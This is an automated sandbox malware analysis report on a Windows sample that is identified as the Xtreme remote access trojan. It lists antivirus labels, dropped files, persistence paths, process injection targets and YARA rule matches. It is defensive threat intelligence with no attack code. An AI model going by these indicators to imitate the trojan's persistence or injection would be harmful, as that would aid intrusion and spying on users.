Analysis Report

Overview

General Information

Joe Sandbox Version:22.0.0
Analysis ID:546427
Start time:10:09:44
Joe Sandbox Product:Cloud
Start date:03.05.2018
Overall analysis duration:0h 15m 51s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:sxz.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed:41
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.expl.spyw.troj.winEXE@61/225@34/1
HCA Information:Failed
EGA Information:
  • Successful, ratio: 71.4%
HDC Information:
  • Successful, ratio: 66.1% (good quality ratio 64.6%)
  • Quality average: 82.3%
  • Quality standard deviation: 25.4%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): conhost.exe, WMIADAP.exe, dllhost.exe
  • Execution Graph export aborted for target explorer.exe, PID 3960 because there are no executed functions
  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: sxz.exe, javaw.exe, java.exe

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Signature Overview



AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user~1\AppData\Local\Temp\358saxio.exe, Avira: Label: DR/Delphi.svunx
Source: C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs, Avira: Label: VBS/Agent.281
Source: C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs, Avira: Label: VBS/Agent.276
Source: C:\Users\user\AppData\Roaming\Microsoft\Skype.exe, Avira: Label: DR/Delphi.svunx
Source: C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs, Avira: Label: VBS/Agent.281
Source: C:\Users\user~1\AppData\Local\Temp\server.exe, Avira: Label: TR/Spy.59904216
Source: C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs, Avira: Label: VBS/Agent.276
Antivirus detection for submitted file
Source: sxz.exe, Avira: Label: DR/Delphi.wqtni
Multi AV Scanner detection for dropped file
Source: C:\Users\user~1\AppData\Local\Temp\358saxio.exe, virustotal: Detection: 48%
Multi AV Scanner detection for submitted file
Source: sxz.exe, virustotal: Detection: 43%
Antivirus detection for unpacked file
Source: 19.1.358saxio.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 27.1.Server.exe.c80000.0.unpack, Avira: Label: TR/Spy.59904216
Source: 5.2.svchost.exe.c80000.6.unpack, Avira: Label: TR/Spy.59904216
Source: 3.2.server.exe.c80000.1.unpack, Avira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.0.unpack, Avira: Label: TR/Spy.59904216
Source: 2.1.sxz.exe.400000.0.unpack, Avira: Label: DR/Injector.toian
Source: 35.2.358saxio.exe.400000.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 27.2.Server.exe.c80000.1.unpack, Avira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.1.unpack, Avira: Label: TR/Spy.59904216
Source: 19.0.358saxio.exe.400000.5.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.server.exe.c80000.2.unpack, Avira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 6.2.iexplore.exe.c80000.2.unpack, Avira: Label: TR/Spy.59904216
Source: 35.1.358saxio.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.iexplore.exe.c80000.0.unpack, Avira: Label: TR/Spy.59904216
Source: 12.2.358saxio.exe.23c0000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.1.unpack, Avira: Label: DR/Injector.toian
Source: 19.2.358saxio.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 14.1.explorer.exe.1b80000.0.unpack, Avira: Label: TR/Spy.59904216
Source: 1.2.sxz.exe.1a40000.3.unpack, Avira: Label: DR/Injector.toian
Source: 35.2.358saxio.exe.1440000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 3.0.server.exe.c80000.0.unpack, Avira: Label: TR/Spy.59904216
Source: 15.1.Server.exe.c80000.0.unpack, Avira: Label: TR/Spy.59904216
Source: 1.0.sxz.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 14.1.explorer.exe.1b80000.1.unpack, Avira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.1.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 27.0.Server.exe.c80000.1.unpack, Avira: Label: TR/Spy.59904216
Source: 5.0.svchost.exe.c80000.0.unpack, Avira: Label: TR/Spy.59904216
Source: 27.0.Server.exe.c80000.0.unpack, Avira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.2.unpack, Avira: Label: TR/Spy.59904216
Source: 2.2.sxz.exe.400000.2.unpack, Avira: Label: DR/Injector.toian
Source: 19.0.358saxio.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 15.2.Server.exe.c80000.1.unpack, Avira: Label: TR/Spy.59904216
Source: 12.2.358saxio.exe.400000.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.3.unpack, Avira: Label: DR/Injector.toian
Source: 2.0.sxz.exe.400000.2.unpack, Avira: Label: DR/Injector.toian
Source: 34.0.iexplore.exe.c80000.0.unpack, Avira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.3.unpack, Avira: Label: TR/Spy.59904216
Source: 3.0.server.exe.c80000.3.unpack, Avira: Label: TR/Spy.59904216
Source: 34.2.iexplore.exe.c80000.2.unpack, Avira: Label: TR/Spy.59904216
Source: 27.0.Server.exe.c80000.3.unpack, Avira: Label: TR/Spy.59904216
Source: 3.0.server.exe.c80000.1.unpack, Avira: Label: TR/Spy.59904216
Source: 2.0.sxz.exe.400000.5.unpack, Avira: Label: DR/Injector.toian
Source: 5.2.svchost.exe.290000.1.unpack, Avira: Label: TR/Spy.59904216
Source: 1.2.sxz.exe.400000.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 27.0.Server.exe.c80000.2.unpack, Avira: Label: TR/Spy.59904216
Source: 12.0.358saxio.exe.400000.1.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 3.1.server.exe.c80000.0.unpack, Avira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.4.unpack, Avira: Label: DR/Injector.toian
Source: 19.0.358saxio.exe.400000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 35.0.358saxio.exe.400000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.1.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.0.unpack, Avira: Label: DR/Injector.toian
Source: 1.1.sxz.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Source: 12.1.358saxio.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen
Yara signature match
Source: 00000003.00000000.14905165956.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14937698570.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000002.14989895202.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.15000788791.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14932929795.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000022.00000000.15012281235.00C80000.00000040.sdmp, type: MEMORY, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000022.00000000.15012281235.00C80000.00000040.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000001.14905808954.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000E.00000001.14937243423.01B81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000002.14987723130.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000001.15007151931.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.15001441864.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000005.00000002.15179880413.00C80000.00000040.sdmp, type: MEMORY, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000005.00000002.15179880413.00C80000.00000040.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.14999659592.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000006.00000002.14955870384.00C80000.00000040.sdmp, type: MEMORY, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000006.00000002.14955870384.00C80000.00000040.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14944848932.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000005.00000002.15177862719.00290000.00000004.sdmp, type: MEMORY, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000005.00000002.15177862719.00290000.00000004.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14950318636.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000001.14957378618.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000006.00000000.14913253676.00C80000.00000040.sdmp, type: MEMORY, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000006.00000000.14913253676.00C80000.00000040.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000000.14904035142.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000E.00000001.14936774837.01B81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000002.15035469105.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000000.14905430148.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000000.14904944731.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000005.00000000.14909911900.00C80000.00000040.sdmp, type: MEMORY, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000005.00000000.14909911900.00C80000.00000040.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.15004091676.00C81000.00000020.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000022.00000002.15021754459.00C80000.00000040.sdmp, type: MEMORY, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000022.00000002.15021754459.00C80000.00000040.sdmp, type: MEMORY, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: C:\Windows\InstallDir\Server.exe, type: DROPPED, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: C:\Windows\InstallDir\Server.exe, type: DROPPED, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: C:\Users\user~1\AppData\Local\Temp\server.exe, type: DROPPED, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: C:\Users\user~1\AppData\Local\Temp\server.exe, type: DROPPED, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 34.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 34.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.1.Server.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.1.Server.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.2.server.exe.c80000.1.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.2.server.exe.c80000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.0.Server.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.0.Server.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.c80000.6.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.c80000.6.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.0.Server.exe.c80000.1.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.0.Server.exe.c80000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.2.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.2.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 6.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 6.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.2.Server.exe.c80000.1.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.2.Server.exe.c80000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 6.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 6.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.c80000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.c80000.6.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 14.1.explorer.exe.1b80000.0.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 14.1.explorer.exe.1b80000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.1.Server.exe.c80000.0.unpack, type: UNPACKEDPE, Matched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
